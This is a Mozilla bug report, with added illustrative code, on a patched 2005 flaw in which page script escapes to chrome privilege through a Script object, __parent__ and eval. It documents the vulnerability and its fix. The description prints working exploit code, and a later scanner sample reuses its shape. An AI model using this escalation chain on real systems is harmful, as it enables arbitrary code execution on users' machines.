new Script() can access chrome window and run arbitrary code with chrome privilege

RESOLVED FIXED

Core
Security
12 years ago
11 years ago

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

Tracking

({fixed-aviary1.0.4, fixed1.7.8})

Trunk
x86
Windows XP
Bug Flags:
blocking1.7.8 +
blocking-aviary1.0.4 +
in-testsuite ?

Details

(Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 attachments)

(Reporter)

Description

12 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix represented in bug 289074 comment 79. The
code in a Script object can access |arguments.callee.__parent__|, which is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

Note:
It is important how the Script object is created. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
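The report above combines several legacy SpiderMonkey idioms (the Script constructor, arguments.callee, __parent__ scope walking, __defineGetter__ on a DOM node, and eval on another object) that a chrome-privileged handler then triggers. As an added example, not part of the bug report or of Mozilla's code, the scanner below flags those idioms in content-script source so they can be caught in review. The pattern list, the risk scoring and both sample inputs are constructed for illustration; the suspicious sample mirrors the testcase shape with a harmless payload.

```javascript
// Added example (not from the bug report): a small static scanner for the
// legacy idioms this bug chains together. Patterns and samples are constructed.
const RISKY_IDIOMS = [
  { id: "legacy-script-ctor", re: /\bnew\s+Script\s*\(/,
    why: "Script object: compiled code runs with the scope chain it was created in" },
  { id: "parent-scope-walk", re: /\.__parent__\b/,
    why: "__parent__ walks up the scope chain, potentially to a privileged window" },
  { id: "callee-reflection", re: /\barguments\.callee\b/,
    why: "arguments.callee exposes the running function and therefore its scope" },
  { id: "getter-hijack", re: /\.__defineGetter__\s*\(/,
    why: "replacing a DOM property getter with a callable that privileged code will invoke" },
  { id: "dynamic-eval", re: /\beval\s*\(/,
    why: "eval executes text in the scope of the object it is called on" },
];

// Return one finding per (line, idiom) hit, with 1-based line numbers.
function scanSource(source) {
  const findings = [];
  source.split("\n").forEach((line, idx) => {
    for (const idiom of RISKY_IDIOMS) {
      if (idiom.re.test(line)) {
        findings.push({ line: idx + 1, id: idiom.id, why: idiom.why, text: line.trim() });
      }
    }
  });
  return findings;
}

// Several distinct idioms together are far more suspicious than any one alone;
// scope walking combined with eval is the exact shape of this bug's testcase.
function riskLevel(findings) {
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has("parent-scope-walk") && ids.has("dynamic-eval")) return "high";
  if (ids.size >= 2) return "medium";
  if (ids.size === 1) return "low";
  return "none";
}

// Constructed sample shaped like the reporter's testcase, harmless payload.
const SAMPLE_SUSPICIOUS = `
var scriptCode = "arguments.callee.__parent__.eval('alert(1)');'';";
var script = (function() {
  function x() { new Object(); }
  return new Script(scriptCode);
})();
document.body.__defineGetter__("type", script);
`;

// Constructed benign sample: ordinary page logic, nothing to flag.
const SAMPLE_BENIGN = `
var total = items.reduce(function (a, b) { return a + b; }, 0);
document.getElementById("out").textContent = total;
`;

// Stand-alone run: prints the findings and the aggregate risk for each sample.
for (const [name, src] of [["suspicious", SAMPLE_SUSPICIOUS], ["benign", SAMPLE_BENIGN]]) {
  const findings = scanSource(src);
  console.log(name, riskLevel(findings), findings.map((f) => `${f.line}:${f.id}`));
}
```

The scanner is line-based on purpose: the idioms it looks for are literal tokens rather than structures, so a regex pass is enough to surface them, and the aggregate score is what makes the result actionable rather than noisy.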
(Reporter)

Comment 1

12 years ago
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
(Reporter)

Comment 2

12 years ago
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
(Reporter)

Comment 3

12 years ago
Created attachment 181111 [details]
testcase 3

each of the ways to create a Script object
(Assignee)

Comment 4

12 years ago
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 5

(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
(Assignee)

Comment 6

12 years ago
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: 256195
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
Comment 7

The more JS can interact with chrome, the more exploits.

Especially if chrome executes JS.
(Assignee)

Comment 8

12 years ago
Created attachment 181234 [details] [diff] [review]
fix
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
(Assignee)

Comment 9

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Comment 10

Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Attachment #181234 - Flags: review?(shaver) → review+
(Assignee)

Comment 11

12 years ago
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment 12

Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988

Updated

12 years ago
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
(Assignee)

Comment 13

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
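The "indirect call error" mentioned above concerns eval being reached through another object (in the testcase, the chrome window's own eval), so that the text runs in that object's scope rather than the caller's. As an added illustration, not code from the bug or the patch, the snippet below shows the rule modern engines settled on in ES5: a direct call to eval sees the caller's locals, while an indirect call (through an alias or a comma expression) runs in the global scope of the realm that owns that eval. The global `probe` binding and the three functions are constructed for this example; the 2005 SpiderMonkey behaviour the patch changed was different (it rejected the indirect call outright).

```javascript
// Added example (not from the bug or the patch): how the form of an eval call
// decides which scope the evaluated text sees. Bindings here are constructed.
// globalThis is used so the global binding exists whether this file runs as a
// CommonJS module (where top-level var is module-scoped) or as a classic script.
globalThis.probe = "global-value";

function directEvalSeesLocals() {
  var probe = "local-value";
  // Direct call: the engine evaluates the text in this function's scope.
  return eval("probe");
}

function aliasedEvalSeesGlobal() {
  var probe = "local-value";
  var aliased = eval;            // any alias makes the call indirect
  return aliased("probe");       // runs in the global scope, ignoring the local
}

function commaEvalSeesGlobal() {
  var probe = "local-value";
  return (0, eval)("probe");     // comma expression: also an indirect call
}

// Summarise the three forms so the difference is visible in one object.
function evalScopeReport() {
  return {
    direct: directEvalSeesLocals(),
    aliased: aliasedEvalSeesGlobal(),
    comma: commaEvalSeesGlobal(),
  };
}

console.log(evalScopeReport());
```

The point for a reviewer is that "which eval" and "how it is called" together determine what the evaluated text can reach; the bug's payload relied on exactly that by calling eval as a property of a more privileged object.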
(Assignee)

Comment 14

12 years ago
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → FIXED

Updated

12 years ago
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+

Updated

12 years ago
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
Comment 15

Other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? Thanks!
Comment 16

In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

Was D) supposed to be fixed?
Keywords: fixed-aviary1.0.4, fixed1.7.8
Comment 17

Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: 256197
No longer blocks: 256195
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?